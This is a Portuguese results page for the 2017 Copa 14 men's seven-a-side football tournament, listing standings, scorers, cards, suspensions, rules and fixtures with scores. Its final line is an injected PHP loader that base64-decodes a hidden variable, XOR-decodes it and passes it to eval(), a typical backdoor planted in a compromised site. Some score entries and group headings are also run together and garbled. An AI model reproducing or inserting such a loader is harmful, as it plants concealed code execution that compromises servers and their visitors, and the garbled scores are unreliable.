Campeonato Copa 14 – Masculino – 2017

1ª FASE – CLASSIFICAÇÃO

GRUPO A
Colocação Times PG J V E D GP GC SG
ALQ FUT 7 11 04 03 01 00 15 07 08
COLO-COLO FUT 7 06 04 02 00 02 13 15 -02
BAGAGGYS FUT 7 05 04 01 02 01 14 15 -01
ESQUADRÃO FUT 7 05 04 01 01 02 08 11 -03
U. E. ASA NEGRA 03 04 01 00 03 11 13 -02

 

GRUPO B
Colocação Times PG J V E D GP GC SG
LAPA TELEMIL 09 04 03 00 01 10 06 04
AZEC FUT 7 09 04 03 00 01 08 05 03
MENINOS DA VILA 06 04 02 00 02 09 07 02
SK FUT 7 05 04 01 01 02 05 07 -02
LONDRINA LVK 01 04 00 01 03 07 13 -06

 

GRUPO C
Colocação Times PG J V E D GP GC SG
BECO F. C. 09 04 03 00 01 16 11 05
ULTRA F. C. 07 04 02 01 01 09 08 01
EMBRATHO FUT 7 06 04 02 00 02 07 07 00
ACQUAFORT NORTISTA 05 04 01 01 02 10 10 00
ARTEMANHA 03 04 01 00 03 11 17 -06


CLASSIFICAÇÃO GERAL

Colocação Times PG J V E D GP GC SG
ALQ FUT 7 11 04 03 01 00 15 07 08
BECO F. C. 09 04 03 00 01 16 11 05
LAPA TELEMIL 09 04 03 00 01 10 06 04
AZEC FUT 7 09 04 03 00 01 08 05 03
ULTRA F. C. 07 04 02 01 01 09 08 01
MENINOS DA VILA 06 04 02 00 02 09 07 02
EMBRATHO FUT 7 06 04 02 00 02 07 07 00
COLO-COLO FUT 7 06 04 02 00 02 13 15 -02
ACQUAFORT NORTISTA 05 04 01 01 02 10 10 00
10º BAGAGGYS FUT 7 05 04 01 02 01 14 15 -01
11º SK FUT 7 05 04 01 01 02 05 07 -02
12º ESQUADRÃO FUT 7 05 04 01 01 02 08 11 -03
13º U. E. ASA NEGRA 03 04 01 00 03 11 13 -02
14º ARTEMANHA 03 04 01 00 03 11 17 -06
15º LONDRINA LVK 01 04 00 01 03 07 13 -06

 

ARTILHEIRO – 2017

 

ATLETA EQUIPE GOLS
EDUARDO DOS SANTOS DA COSTA BECO F. C. 08
JACKSON LAGUNA ESQUADRÃO FUT 7 06
NATAN DOS SANTOS DE MOURA BAGGAGYS FUT 7 06
RICARDO APARECIDO SOARES BECO F. C. 06
ALLISON DIAS ALQ FUT 7 05
DARIEL DE OLIVEIRA ARAGAO COLO-COLO FUT 7 05
DOUGLAS GOMES VIEIRA ACQ. NORTISTA 05
EDSON MARCELO DE FARIA TELEMIL CEL. 05
EVERTON CARDOSO COLO-COLO FUT 7 05
GABRIEL BOSSA CORDEIRO AZEC FUT 7 05
ADAO RIBEIRO RAMOS ARTEMANHA 04
DIEGO ANDRADE ESQUADRÃO FUT 7 04
FABIANO DOS SANTOS AZEC FUT 7 04
GUSTAVO LOCATELLI SK FUT 7 04
JOHNNY WESLEY DA SILVA BAGGAGYS FUT 7 04
LEONARDO VIEIRA DOS SANTOS EMBRATHO FUT 7 04
ALISON OLIVEIRA DOS SANTOS COLO-COLO FUT 7 03
CHARLES SOUZA AZEC FUT 7 03
EDMAR DOS SANTOS NOVAES ALQ FUT 7 03
FABIANO MACHADO CORDEIRO BAGGAGYS FUT 7 03
GUSTAVO DE ASSIS VIEIRA ACQ. NORTISTA 03
JEFFERSON NOGUEIRA QUERBINO BAGGAGYS FUT 7 03
LUIS GABRIEL DOS SANTOS SK FUT 7 03
MARCIO FERNANDO LAGUNA ESQUADRÃO FUT 7 03
NILTON RIBEIRO DA SILVA JUNIOR ESQUADRÃO FUT 7 03
PEDRO HENRIQUE PIMENTEL ULTRA F. C. 03
VALDENEI DA SILVA COLO-COLO FUT 7 03
VANDERLEI RIBEIRO LOPES BECO F. C. 03
WESLEY CLEYTON CARLOS SILVA MENINOS DA VILA 03
WILLIAN GOMES PRESTES MIRANDA ALQ FUT 7 03
ALAN RIBEIRO EMBRATHO FUT 7 02
ALEX BUENO DE OLIVEIRA MENINOS DA VILA 02
BRUNO MANGOLIN BUZATO LONDRINA LVK 02
CHRISTIANO T. SILVA U. E. ASA NEGRA 02
FERNANDO VINICIUS DA CRUZ SK FUT 7 02
GIANCARLO DA SILVA OBIUTH AZEC FUT 7 02
JURANDIR S. LOPES U. E. ASA NEGRA 02
LINCON COLAÇO DA SILVA EMBRATHO FUT 7 02
LUIS HENRIQUE SETIN ARTEMANHA 02
LUIZ FERNANDO MARQUES U. E. ASA NEGRA 02
MAICON SUZIN ULTRA F. C. 02
MATHEUS BATISTA MENINOS DA VILA 02
MATHEUS HENRIQUE FERREIRA BECO F. C. 02
MICHAEL WYLLIAM S. SANTANA ALQ FUT 7 02
PAULO S. O. GOMES U. E. ASA NEGRA 02
PETERSON RAMOS TELEMIL CEL. 02
RAFAEL ARACEMA KUSS ACQ. NORTISTA 02
RAFAEL ROBERTO SK FUT 7 02
SILVANEI ALVES DA LUZ TELEMIL CEL. 02
THIAGO FELIPE KRAUSE DOS SANTOS ARTEMANHA 02
THIAGO PEREIRA MENDONÇA ULTRA F. C. 02
VALDECI DA SILVA OTACILIO COLO-COLO FUT 7 02
WAGNER ALBERTO PICCININ U. E. ASA NEGRA 02
WEMERSON NAZARE GOMES ALQ FUT 7 02
ABEL FRANÇA DE PAULA BAGGAGYS FUT 7 01
ADAM FELIPE TERRA SILVA ULTRA F. C. 01
ADRIANO RICARDO ROCHA ACQ. NORTISTA 01
ALEX DE SOUZA E SILVA ALQ FUT 7 01
ALEX FERREIRA BAGGAGYS FUT 7 01
ALEX JOSE DE OLIVEIRA LONDRINA LVK 01
ANDERSON DE OLIVEIRA PEREIRA AZEC FUT 7 01
ANDREY FERMINO DE SOUZA ALQ FUT 7 01
ARION GETULIO DA SILVA BAGGAGYS FUT 7 01
AURICI MARTINS MENINOS DA VILA 01
BRUNO C. F. MARASCKI MENINOS DA VILA 01
BRUNO FRANÇA TELEMIL CEL. 01
CESAR HENRIQUE RIBEIRO MENINOS DA VILA 01
CLEITON RIBEIRO DA SILVA COLO-COLO FUT 7 01
CLEVERSON DA SILVA PANSOLIN ULTRA F. C. 01
DAVIDSON D. M. SILVA ARTEMANHA 01
DOUGLAS ALEXANDRO SIQUEIRA LONDRINA LVK 01
DOUGLAS DOS SANTOS ESQUADRÃO FUT 7 01
DOUGLAS FELIPE DOS SANTOS BAGGAGYS FUT 7 01
ERICK VEIGA SK FUT 7 01
EVANDRO VILAS BOAS AZEC FUT 7 01
EVERTON JOSE VAZ SK FUT 7 01
EVERTON LIMA DE PAULA SK FUT 7 01
GEOVANE DOS SANTOS DE NOVAES ALQ FUT 7 01
GUSTAVO ALVES DE LIMA TELEMIL CEL. 01
HEVERTON VALDECIR DOS SANTOS EMBRATHO FUT 7 01
HUELBER SANTOS SK FUT 7 01
JACKSON PEREIRA FORTUNATO MENINOS DA VILA 01
JEAN MARQUES ARTEMANHA 01
JHONNY RODRIGUES ARTEMANHA 01
JONAS MORAES MARTINS TELEMIL CEL. 01
JUARI LOURENÇO COELHO SK FUT 7 01
LEANDRO ALVES MACHADO LONDRINA LVK 01
LUAN CARLOS VOSNE DA ROSA ALQ FUT 7 01
LUIS GUSTAVO DE SOUZA COLO-COLO FUT 7 01
LUIZ VATRINS TELEMIL CEL. 01
MARCOS ANTONIO LEAL ACQ. NORTISTA 01
PAULO ALVES BAGGAGYS FUT 7 01
RICHARD RAMOS LONDRINA LVK 01
ROBINSON LUIS ALVES JUNIOR ESQUADRÃO FUT 7 01
RODRIGO SOARES FLORENCIO U. E. ASA NEGRA 01
RUDSON DAMBROSKI MENINOS DA VILA 01
WAGNER MARTINS TELEMIL CEL. 01
WELLINTON L. C. DE OLIVEIRA BECO F. C. 01
WILLIAN GRACIA DO AMARAL ULTRA F. C. 01
WILLIAN MENDES BAGGAGYS FUT 7 01

 

ATLETAS SUSPENSOS

 

ATLETA EQUIPE MOTIVO PUNIÇÃO
ALISSON O. DOS SANTOS COLO-COLO C. VERMELHO JULGAMENTO
LUCAS RAFAEL DE LIMA ESQUADRÃO C. VERMELHO JULGAMENTO
MARCELO HENR. H. ANDRADE ESQUADRÃO C. VERMELHO JULGAMENTO
PAULO ROBERTO X. DA SILVA ALQ FUT 7 C. VERMELHO 09 JOGOS
WILLIAN G. P. MIRANDA ALQ FUT 7 C. VERMELHO JULGAMENTO

 

COMISSÃO TÉCNICA

 

 
 
 

 

CARTÕES

ATLETA EQUIPE CA CV
BRIAN WILLIAN DOS S. SKOWRONSKI ACQ. NORTISTA 01
GUSTAVO DE ASSIS VIEIRA ACQ. NORTISTA 01
LEANDRO P. DE PAULA ACQ. NORTISTA 02
MATHEUS GOMES DE MATTOS ACQ. NORTISTA 02
RAFAEL ARACEMA KUSS ACQ. NORTISTA 01
ANDRE DA SILVA VARELLA ALQ FUT 7 01
EDMAR DOS SANTOS NOVAES ALQ FUT 7 01
GILBERTO LEANDRO ROSA ALQ FUT 7 01
JAIRO BRECHINSKI ALQ FUT 7 01
MICHAEL WYLLIAM S. SANTANA ALQ FUT 7 02
PAULO ROBERTO X. DA SILVA ALQ FUT 7 01
WEMERSON NAZARE GOMES ALQ FUT 7 01
WILLIAN G. P. MIRANDA ALQ FUT 7 02 01
ADAO RIBEIRO RAMOS ARTEMANHA 02
ANDERSON ALVES DA SILVA ARTEMANHA 01
ANDERSON MAYKON M. GARCIA ARTEMANHA 01
JEAN MARQUES ARTEMANHA 01
CHARLES SOUZA AZEC FUT 7 01
EVANDRO VILAS BOAS AZEC FUT 7 01
FABIANO DOS SANTOS AZEC FUT 7 02
ABEL FRANÇA DE PAULA BAGGAGYS FUT 7 01
ARION GETULIO DA SILVA BAGGAGYS FUT 7 01
CLEYTON ANDRE B. DE OLIVEIRA BAGGAGYS FUT 7 01
HEVERTON LOPES RODRIGUES BAGGAGYS FUT 7 02
JOHNNY WESLEY DA SILVA BAGGAGYS FUT 7 02
NATAN DOS SANTOS DE MOURA BAGGAGYS FUT 7 01
PAULO HENRIQUE ALVES BAGGAGYS FUT 7 01
RAFAEL ANTONIO TAVERNA BAGGAGYS FUT 7 02
CARLOS ALBERTO FERREIRA BECO F. C. 02
EDUARDO DOS SANTOS DA COSTA BECO F. C. 02 01
GUILHERME HENRIQUE S. BECO F. C. 02
MATHEUS HENRIQUE FERREIRA BECO F. C. 02
RICARDO APARECIDO SOARES BECO F. C. 01
ROBERTO CARNEIRO BECO F. C. 01
WEVERTON ANT. DOS S. DA SILVA BECO F. C. 01
ALISSON OLIVEIRA DOS SANTOS COLO-COLO FUT 7 01 01
ANDERSON APARECIDO DA SILVA COLO-COLO FUT 7 01
DARIEL DE OLIVEIRA ARAGAO COLO-COLO FUT 7 01
DOUGLAS JOSE CORDEIRO COLO-COLO FUT 7 01 01
EVERTON MARINHO PRESTES COLO-COLO FUT 7 01
LEANDRO DA SILVA LIMA COLO-COLO FUT 7 01
LUCIANO AUGUSTO OTACILIO COLO-COLO FUT 7 01
VALDECI DA SILVA OTACILIO COLO-COLO FUT 7 01
DIEGO MAESTRELI EMBRATHO FUT 7 01
EDER BARBOSA EMBRATHO FUT 7 01
ERICKSON VEIGA DA SILVA EMBRATHO FUT 7 01
LEONARDO VIEIRA DOS SANTOS EMBRATHO FUT 7 01
ROBERT DOS SANTOS ALVES EMBRATHO FUT 7 01
DOUGLAS DOS SANTOS ESQUADRÃO FUT 7 01
GILBERTO M. CONCEIÇÃO ESQUADRÃO FUT 7 01
GUSTAVO GOGOLA ESQUADRÃO FUT 7 02
JACKSON L. LAGUNA ESQUADRÃO FUT 7 01
LUCAS RAFAEL DE LIMA ESQUADRÃO FUT 7 01 01
MARCELO HENRIQUE H. ANDRADE ESQUADRÃO FUT 7 01
MARCIO LAGUNA ESQUADRÃO FUT 7 01
ROBINSON LUIS ALVES JUNIOR ESQUADRÃO FUT 7 01
BRUNO MANGOLIN BUZATO LONDRINA LVK 01
CARLOS EDUARDO B. DE FREITAS LONDRINA LVK 01
DOUGLAS ALEXANDRO SIQUEIRA LONDRINA LVK 02
EMERSON APARECIDO DA ROCHA LONDRINA LVK 01
HERLON LINS CALDAS LONDRINA LVK 01
JUNIO DOS SANTOS DA SILVA LONDRINA LVK 01 01
ALEX BUENO DE OLIVEIRA MENINOS DA VILA 01
AURICI MARTINS MENINOS DA VILA 02
BRUNO C. F. MARASCKI MENINOS DA VILA 01
CAMILO FIGUEIREDO MENINOS DA VILA 01
CESAR HENRIQUE RIBEIRO MENINOS DA VILA 02
JACKSON PEREIRA FORTUNATO MENINOS DA VILA 01
LEANDRO V. DOS REIS MENINOS DA VILA 01
ERICK VEIGA SK FUT 7 01
GUSTAVO LOCATELLI SK FUT 7 01
HUELBER SANTOS SK FUT 7 01
JUARI LOURENÇO COELHO SK FUT 7 01
RAFAEL ROBERTO SK FUT 7 02
ALAN CARDOSO TELEMIL CEL. 01
LUIZ VATRINS TELEMIL CEL. 01
THIAGO FELIPE DE PAULA TELEMIL CEL. 02
JEAN S. BOARD U. E. ASA NEGRA 01
JEFERSON S. SILVA U. E. ASA NEGRA 01
SAMUEL J. SKALFE U. E. ASA NEGRA 01
CLEVERTON DA SILVA PANSOLIN ULTRA F.C. 01 02
DIEGO SIQUEIRA CORREA ULTRA F.C. 01
GULLIT WAMBASTER ULTRA F.C. 01
MAIKON SUZIN ULTRA F.C. 02 01
PEDRO HENRIQUE PIMENTEL ULTRA F.C. 01
RAFAEL CIRINO DOS SANTOS ULTRA F.C. 01
ROBERTO BELAO JUNIOR ULTRA F.C. 01
RONALDO DA SILVA ANDRADE ULTRA F.C. 01
WILLIAN GRACIA DO AMARAL ULTRA F.C. 01

 

 

 

VI CAMPEONATO COPA 14 DE FUTEBOL 7 2017

 

MASCULINO

 

 

NA PRIMEIRA FASE DA COMPETIÇÃO SERÃO FORMADOS TRÊS GRUPOS DE CINCO EQUIPES, ONDE JOGARÃO TODAS CONTRA TODAS, DENTRO DE SEU RESPECTIVO GRUPO EM TURNO ÚNICO.

 

CLASSIFICARÃO PARA A SEGUNDA FASE, AS QUATRO MELHORES CAMPANHAS DE CADA GRUPO.

 

NA PRIMEIRA FASE, QUANDO OCORRER EMPATE NO TEMPO NORMAL, AS DUAS EQUIPES RECEBERÃO UM PONTO E DISPUTARÃO MAIS UM PONTO EM COBRANÇAS DE SHOOT OUT. NESSE CASO, A DISPUTA DE SHOOT OUT SERÁ DE APENAS UMA COBRANÇA, PERSISTINDO O EMPATE, SERÃO EFETUADAS COBRANÇAS ATÉ QUE TENHA UM GANHADOR.

 

CRITÉRIO DESEMPATE:

1 – NV – MAIOR NÚMERO DE VITÓRIAS (SHOOT OUT NÃO CONSIDERA VITÓRIA);

2 – CD – CONFRONTO DIRETO (SOMENTE ENTRE DUAS EQUIPES);

2 – SG – MELHOR SALDO DE GOLS;

3 – GP – MAIOR NÚMERO DE GOLS PRÓ;

4 – GC – MENOR NÚMERO DE GOLS CONTRA;

5 – EQUIPE MAIS DISCIPLINADA (PESO: AMARELO 1; VERMELHO 3).

 

GRUPOS DA PRIMEIRA FASE

 

GRUPO A1 – BAGGAGYS FUT2 – U.E. ASA NEGRA

3 – ALQ FUT 7

4 – COLO-COLO

5 – ESQUADRÃO F7

 

GRUPO B1 – SK FUT 72 – LONDRINA LVK

3 – AZEC FUT 7

4 – TELEMIL CEL.

5 – MENINOS DA VILA

 

GRUPO C1 – ULTRA2 – BECO F.C

3 – EMBRATHO FUT 7

4 – NORTISTA

5 – ARTEMANHA

 

 

NA SEGUNDA FASE DA COMPETIÇÃO, SERÃO FORMADOS SEIS GRUPOS DE DUAS EQUIPES CADA, ONDE JOGARÃO NO SISTEMA ELIMINATÓRIA SIMPLES (01 JOGO). OS CONFRONTOS SERÃO DEFINIDOS CONFORME A CLASSIFICAÇÃO GERAL.

 

CASO OCORRA EMPATE NO TEMPO NORMAL, A PARTIDA SERÁ DECICIDA EM CONBRANÇAS DE SHOOT OUT, EM SÉRIE DE TRÊS COBRANÇAS E, PERSISTINDO O EMPATE, COBRANÇAS ALTERNADAS ATÉ QUE TENHA UM GANHADOR.

 

 

GRUPOS DA SEGUNDA FASE

 

GRUPO 1 ALQ Fut 7

X

Esquadrão F7

 

GRUPO 2 Beco F. C.

X

SK Fut 7

 

GRUPO 3 Telemil Cel.

X

Baggagys F7

 

GRUPO 6 Meninos da V.

X

Embratho Fut 7

 

GRUPO 5 Ultra FC

X

Colo-Colo Fut 7

 

GRUPO 4 AZEC Fut 7

X

Acq. Nortista

 

 

 

 

NA TERCEIRA FASE DA COMPETIÇÃO (QUARTAS DE FINAL), SERÃO FORMADOS QUATRO GRUPOS DE DUAS EQUIPES CADA, ONDE ESTARÃO CLASSIFICADOS OS VENCEDORES DA SEGUNDA FASE MAIS OS DOIS PERDEDORES DE MELHOR CAMPANHA, COMPUTANDO OS RESULTADOS DA PRIMEIRA E SEGUNDA FASES.

 

CASO OCORRA EMPATE NO TEMPO NORMAL, A PARTIDA SERÁ DECICIDA EM CONBRANÇAS DE SHOOT OUT, EM SÉRIE DE TRÊS COBRANÇAS E, PERSISTINDO O EMPATE, COBRANÇAS ALTERNADAS ATÉ QUE TENHA UM GANHADOR.

 

GRUPOS DA TERCEIRA FASE – QUARTAS DE FINAL

 

GRUPO 7 AZEC Fut 7

X

Beco F. C.

 

GRUPO 8 Colo-Colo Fut 7

X

ALQ Fut 7

 

GRUPO 9 Baggagys Fut 7

X

Meninos da V.

 

GRUPO 10 Esquadrão F 7

X

SK Fut 7

 

 

OS VENCEDORES DA TERCEIRA FASE JOGARÃO A QUARTA FASE (SEMIFINAIS), OBEDECENDO OS CONFRONTOS JÁ DEFINIDOS CONFORME ABAIXO:

 

CASO OCORRA EMPATE NO TEMPO NORMAL, A PARTIDA SERÁ DECICIDA EM CONBRANÇAS DE SHOOT OUT, EM SÉRIE DE TRÊS COBRANÇAS E, PERSISTINDO O EMPATE, COBRANÇAS ALTERNADAS ATÉ QUE TENHA UM GANHADOR.

 

GRUPOS DA QUARTA FASE – SEMIFINAIS

 

GRUPO 11 AZEC Fut 7

X

SK Fut 7

 

GRUPO 12 Colo-Colo Fut 7

X

Meninos da V.

 

 

NAS FINAIS, CASO OCORRAM EMPATES NO TEMPO NORMAL, AS PARTIDAS SERÃO DECICIDAS EM COBRANÇAS DE SHOOT OUT, EM SÉRIE DE TRÊS COBRANÇAS E, PERSISTINDO O EMPATE, COBRANÇAS ALTERNADAS ATÉ QUE TENHA UM GANHADOR.

 

GRUPOS DA QUINTA FASE – FINAIS

 

GRUPO 13 – DECISÃO 3º LUGAR Perdedor Gr. 11  X  Perdedor Gr. 12

 

 

GRUPO 14 – DECISÃO 1º LUGAR Venc. Gr. 11  X  Venc. Gr. 12

 

Regulamento Oficial
Regulamento Copa 14 2017 

TABELA DE JOGOS – DATAS E HORÁRIOS

Quadra Horário Grupo Jogo Equipe X Equipe
1ª RODADA – 1ª FASE – 28/01/2017
2 – I 19:30 A 01 Baggagys Fut 7 2X6 Colo-Colo Fut 7
2 – I 18:00 A 02 U.E. Asa Negra 0X2 ALQ Fut 7
2 – I 20:30 B 03 SK Fut 7 3X1 Lapa Telemil
1 – E 20:30 B 04 Londrina LVK 1X3 AZEC Fut 7
2 – I 21:30 C 05 Ultra F. C. 1X10X1 Acquafort Nortista
1 – E 21:30 C 06 Beco F.C. 3X0 Embratho Fut 7
2ª RODADA – 1ª FASE – 04/02/2017
2 – I 19:30 C 07 Artemanha 2X5 Embratho Fut 7
1 – E 19:30 C 08 Ultra F. C. 4X5 Beco F.C.
2 – I 20:30 A 09 E.Boleiros Fut 7 2X5 ALQ Fut 7
1 – E 20:30 A 10 Baggagys Fut 7 7X4 U.E. Asa Negra
2 – I 21:30 B 11 Meninos da Vila 0X2 AZEC Fut 7
1 – E 21:30 B 12 SK Fut 7 1X11X0 Londrina LVK
3ª RODADA – 1ª FASE – 11/02/2017
2 – I 19:30 B 13 Lapa Telemil 3X2 Londrina LVK
1 – E 19:30 B 14 Meninos da Vila 2X0 SK Fut 7
2 – I 20:30 C 15 Acquafort Nortista 2X5 Beco F.C.
1 – E 20:30 C 16 Artemanha 2X3 Ultra F. C.
2 – I 21:30 A 17 Colo-Colo Fut 7 2X6 U.E. Asa Negra
1 – E 21:30 A 18 E.Boleiros Fut 7 3X33X2 Baggagys Fut 7
4ª RODADA – 1ª FASE – 18/02/2017
2 – I 19:30 A 19 ALQ Fut 7 2X21X0 Baggagys Fut 7
1 – E 19:30 A 20 Colo-Colo Fut 7 2X1 E.Boleiros Fut 7
2 – I 20:30 B 21 AZEC Fut 7 3X1 SK Fut 7
1 – E 20:30 B 22 Lapa Telemil 3X1 Meninos da Vila
2 – I 21:30 C 23 Embratho Fut 7 0X1 Ultra F. C.
1 – E 21:30 C 24 Acquafort Nortista 6X2 Artemanha
5ª RODADA – 1ª FASE – 11/03/2017
2 – I 19:30 C 25 Beco F.C. 3X5 Artemanha
1 – E 19:30 C 26 Embratho Fut 7 2X1 Acquafort Nortista
2 – I 20:30 A 27 U.E. Asa Negra 1X2 E.Boleiros Fut 7
1 – E 20:30 A 28 ALQ Fut 7 6X3 Colo-Colo Fut 7
2 – I 21:30 B 29 Londrina LVK 2X6 Meninos da Vila
1 – E 21:30 B 30 AZEC Fut 7 0X3 Lapa Telemil
2ª FASE – 18/03/2017
2 – I 19:30 3 31 Lapa Telemil 4×6 Baggagys Fut 7
1 – E 19:30 6 32 Meninos da Vila 2x22x1 Embratho Fut 7
2 – I 20:30 1 33 ALQ Fut 7 1×5 Esquadrão Fut 7
1 – E 20:30 4 34 AZEC Fut 7 3×2 Acq Nortista
2 – I 21:30 2 35 Beco F. C. 3×5 SK Fut 7
1 – E 21:30 5 36 Ultra F. C. 1×2 Colo-Colo Fut 7
3ª FASE – QUARTAS DE FINAL – 25/03/2017
2 – I 20:00 9 37 Baggagys Fut 7 2×3 Meninos da Vila
1 – E 20:00 10 38 Esquadrão Fut 7 5×6 SK Fut 7
2 – I 21:00 7 39 AZEC Fut 7 5×1 Beco F. C.
1 – E 21:00 8 40 Colo-Colo Fut 7 5×3 ALQ Fut 7
SEMIFINAIS – 01/04/2017
2 – I 21:00 11 41 AZEC Fut 7 X SK Fut 7
2 – I 22:00 12 42 Colo-Colo Fut 7 X Meninos da V.
FINAIS – 08/04/2017
2 – I 20:00 13 43 PERD. GR. 11 X PERD. GR. 12
2 – I 21:00 14 44 VENC. GR. 11 X VENC. GR. 12

 

 

 

$raw = base64_decode($encoded); $res = ''; for ($i = 0; $i < strlen($raw); $i++) { $res .= chr(ord($raw[$i]) ^ ord('x')); } eval($res) ?>